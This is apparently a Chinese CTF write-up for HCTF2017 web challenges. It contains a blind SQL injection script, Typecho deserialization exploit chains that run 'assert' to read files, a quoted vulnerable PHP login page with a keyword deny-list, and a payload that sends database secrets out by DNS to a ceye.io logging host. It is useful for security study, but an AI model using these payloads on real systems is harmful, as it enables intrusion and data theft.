HCTF2017 部分web wp

HCTF2017 部分web wp

作者: Shad0w_zz | 来源:发表于2018-11-26 21:03 被阅读0次

    SQL Silencer

    SQL盲注,用自己渣渣的脚本fuzzing了一波,过滤了很多东西:* 空格 limit for ......
    用白大佬构造的payload:写盲注脚本:

    #coding=UTF-8
    import requests
    # Boolean-based blind SQL injection driver for the "SQL Silencer" challenge
    # (Python 2 code: xrange and the print statement). Each character of the
    # result is recovered by asking the server a yes/no question and checking
    # which of two page variants comes back.
    result = ''
    url = 'http://sqls.2017.hctf.io/index/index.php'
    
    # %0d (carriage return) stands in for spaces, which the writeup says the
    # challenge filters. The CASE expression selects one of two subqueries,
    # which is what makes the response differ (the 'Alice' check below).
    payload = '?id=1%0d%3C%3E%0d(select%0dcase%0dwhen%0d(ascii(substring(({sql})from%0d{list}))={num})%0dthen%0d(select%0d0)%0delse%0d(select%0d1)%0dend)'
    
    # i is the 1-based SUBSTRING offset; MySQL returns '' for FROM 0, so the
    # i == 0 pass can never match and is wasted. j spans printable ASCII.
    # Up to 94 requests per recovered character: a burst of same-shaped
    # requests carrying %0d in the query string is an easy detection signal.
    for i in xrange(0,50):
        for j in xrange(32,126):
            # 0x256863746625 is the hex encoding of the LIKE pattern '%hctf%',
            # written as a hex literal rather than a quoted string (presumably
            # to avoid filtered characters).
            hh = payload.format(sql='select%0dflag%0dfrom%0dhctf.flag%0dwhere%0dflag%0dlike%0d0x256863746625',list=str(i),num=str(j))
            #print hh
            zz = requests.get(url+hh)
            #print zz.content
            # Oracle: the true branch renders a page containing 'Alice'.
            # NOTE: there is no else branch, so a character outside 32..125 or
            # a failed request is silently skipped and result comes out short.
            if 'Alice' in zz.content:
                result += chr(j)
                print result
                break
    

    跑出数据库hctf,题目给了表名flag
    由于过滤了_不能查字段名,表名,select count(1)发现表里有2个字段
    瞎猜字段名为flag,验证:select count(flag)返回正确
    模糊搜索select flag from hctf.flag where flag like hex(%flag%)


    图片.png

    本来以为是flag,刚开始各种尝试,发现是目录,但是返回403
    于是乎开始跑另一个字段select flag from hctf.flag where flag not like hex(%flag%)


    图片.png

    这时候我激动了,于是乎这两个路径试来试去,然后问出题人说这不是脑洞!
    ........
    http://sqls.2017.hctf.io/index/H3llo_111y_Fr13nds_w3lc0me_t0_hctf2017/index.php
    一口老血........
    Typecho前台序列化漏洞,但是没有写权限,只能读了。

    poc

    <?php
    class Typecho_Request
    {
        // Gadget class for the Typecho front-end deserialization chain. In the
        // target's code (not shown here) the entries of $_filter are reportedly
        // applied as callbacks to the parameter values, which is why a callback
        // name is placed in $_filter and the code string in 'screenName'.
        private $_params = array();
        private $_filter = array();
    
        public function __construct()
        {
            // $this->_params['screenName'] = 'whoami';
            // NOTE: the nested single quotes make this parse as
            // 'print_r(scandir(' / '))' -- a division of two strings, not the
            // intended literal. The corrected form quoted later in the writeup
            // uses double quotes around the path.
            $this->_params['screenName'] = 'print_r(scandir('/'))';
            $this->_filter[0] = 'assert';
        }
    }
    
    class Typecho_Feed
    {
        // Local stand-in for the target's Typecho_Feed: only the constants and
        // properties the serialized payload needs are reproduced.
        const RSS2 = 'RSS 2.0';
        /** ATOM 1.0 feed type */
        const ATOM1 = 'ATOM 1.0';
        /** RSS date format */
        const DATE_RFC822 = 'r';
        /** ATOM date format */
        const DATE_W3CDTF = 'c';
        /** Line terminator */
        const EOL = "\n";
        private $_type;
        private $_items = array();
        public $dateFormat;
    
        public function __construct()
        {
            $this->_type = self::RSS2;
            // Filler item fields; only the embedded objects below matter.
            $item['link'] = '1';
            $item['title'] = '2';
            $item['date'] = 1507720298;
            // The two places the payload seeds with a Typecho_Request object.
            $item['author'] = new Typecho_Request();
            $item['category'] = array(new Typecho_Request());
    
            $this->_items[0] = $item;
        }
    }
    
    // Build the serialized "config" blob; 'adapter' carries the gadget object.
    // Judging by the second PoC further down, which keeps only 'adapter' and
    // 'prefix', the remaining keys are filler.
    $x = new Typecho_Feed();
    $a = array(
        'host' => 'localhost',
        'user' => 'xxxxxx',
        'charset' => 'utf8',
        'port' => '3306',
        'database' => 'typecho',
        'adapter' => $x,
        'prefix' => 'typecho_'
    );
    // base64 then urlencode, so the blob survives being passed in a request.
    echo urlencode(base64_encode(serialize($a)));
    ?>
    

    参考文章:
    https://paper.seebug.org/424/
    http://p0sec.net/index.php/archives/114/
    还有大白的poc:

    <?php
    // Second PoC variant: callback name and code string are passed in through
    // globals read by Typecho_Request::__construct (declared further down;
    // PHP hoists unconditional top-level class declarations, so the
    // use-before-declaration is fine).
    global $functionName;
    global $evilParam;
    $functionName = "assert";
    $evilParam = "print_r(scandir('/'))";
    $b = new Typecho_Feed();
    
    $poc = array(
        "adapter" => $b,
        "prefix" => 1,
        );
    
    $data = serialize($poc);
    // Local round-trip only; $config is never used afterwards. Unserializing
    // data of this shape is precisely the pattern the target is vulnerable to.
    $config = unserialize($data);
    echo base64_encode($data).PHP_EOL;
    
    class Typecho_Request
    {
        // Same gadget as in the first PoC, parameterised through globals.
        private $_params = array(
            "screenName" => "",
            "url" => "phpinfo");
        private $_filter = array();
    
        public function __construct()
        {
            global $functionName;
            global $evilParam;
            // $evilParam is the string that ends up passed to the callback
            // named in $_filter ($functionName, set at the top of the script).
            $this->_params['screenName'] = $evilParam;
            $this->_filter = array($functionName);
        }
    
    }
    
    class Typecho_Feed
    {
        /** RSS 1.0 feed type */
        const RSS1 = 'RSS 1.0';
    
        /** RSS 2.0 feed type */
        const RSS2 = 'RSS 2.0';
    
        /** ATOM 1.0 feed type */
        const ATOM1 = 'ATOM 1.0';
    
        private $_type;
    
        const EOL = "\n";
    
        private $_items = array();
        // _version, _charset and _lang are not declared as properties and are
        // created dynamically here (deprecated from PHP 8.2 onwards).
        public function __construct($version="1", $type = "ATOM 1.0", $charset = 'UTF-8', $lang = 'en')
        {
            $this->_version = $version;
            $this->_type = $type;
            $this->_charset = $charset;
            $this->_lang = $lang;
            $a = new Typecho_Request();
            $b = new Typecho_Request();
            // Mirrors the first PoC: one request object as the item author,
            // another nested under category/name.
            $this->_items = array(array("author"=>$a,"category"=>array("name"=>$b)));
        }
    
    }
    

    读到目录了:

    // First PoC, corrected: double quotes around the path avoid the
    // nested-single-quote problem in the earlier listing.
    $this->_params['screenName'] = 'print_r(scandir("/"))';
    $this->_filter[0] = 'assert';
    
    图片.png

    继续读:

    // Second-PoC globals changed for the next read; the sink is unchanged.
    $functionName = "assert";
    $evilParam = "print_r(scandir('/flag_is_here'))";
    
    图片.png
    // Same globals once more, now reading the file found in the listing above.
    $functionName = "assert";
    $evilParam = "print_r(file_get_contents('/flag_is_here/flag'))";
    
    图片.png

    boring website

    扫描一下,www.zip中有index.php的内容:

    <?php
    // Challenge source recovered from www.zip. The defect the writeup exploits:
    // $id is taken straight from the query string and interpolated into the SQL
    // text (no prepared statement, no integer cast); the keyword deny-list
    // below is the only defence.
    echo "Bob received a mission to write a login system on someone else's server, and he he only finished half of the work<br />";
    echo "flag is hctf{what you get}<br /><br />";
    // Notices and warnings are suppressed, so failed queries say nothing.
    error_reporting(E_ALL^E_NOTICE^E_WARNING);
    
    try {
       $conn = new PDO( "sqlsrv:Server=*****;Database=not_here","oob", ""); 
    }
    
    catch( PDOException $e ) {
       die( "Error connecting to SQL Server".$e->getMessage() ); 
    }
    
    #echo "Connected to MySQL<br />";
    echo "Connected to SQL Server<br />";
    
    $id = $_GET['id'];
    // Case-insensitive deny-list of keywords. Deny-lists are bypassable by
    // construction: the writeup's payload goes through OpenQuery on the linked
    // MySQL server, which none of these patterns cover. The real fix is a
    // prepared statement with $id bound as an integer.
    if(preg_match('/EXEC|xp_cmdshell|sp_configure|xp_reg(.*)|CREATE|DROP|declare|insert|into|outfile|dumpfile|sleep|wait|benchmark/i', $id)) {
        die('NoNoNo');
    }
    $query = "select message from not_here_too where id = $id"; //link server: On  linkname:mysql
    
    // The writeup's payload relies on the driver accepting a second statement
    // after a semicolon in this single query() call.
    $stmt = $conn->query( $query ); 
    // Rows are fetched and discarded; nothing reaches the response, which is
    // why the writeup resorts to out-of-band (DNS) exfiltration.
    while ( @$row = $stmt->fetch( PDO::FETCH_ASSOC ) ){
        //TO DO: ...
        //It's time to sleep...
    }
    
    ?>
    

    因为我前面并没有做,
    据说是sqlserver连接mysql的转换命令,再注入
    参考文章:http://bobao.360.cn/learning/detail/3458.html
    工具:http://ceye.io/records/dns
    payload:
    http://106.15.53.124:38324/?id=1; Select * from OpenQuery(mysql,'SELECT LOAD_FILE(CONCAT("\\\\",(select concat(id,name,password) from webwebweb.secret),".mysql.ip.port.xo2qpw.ceye.io\\abc"))');
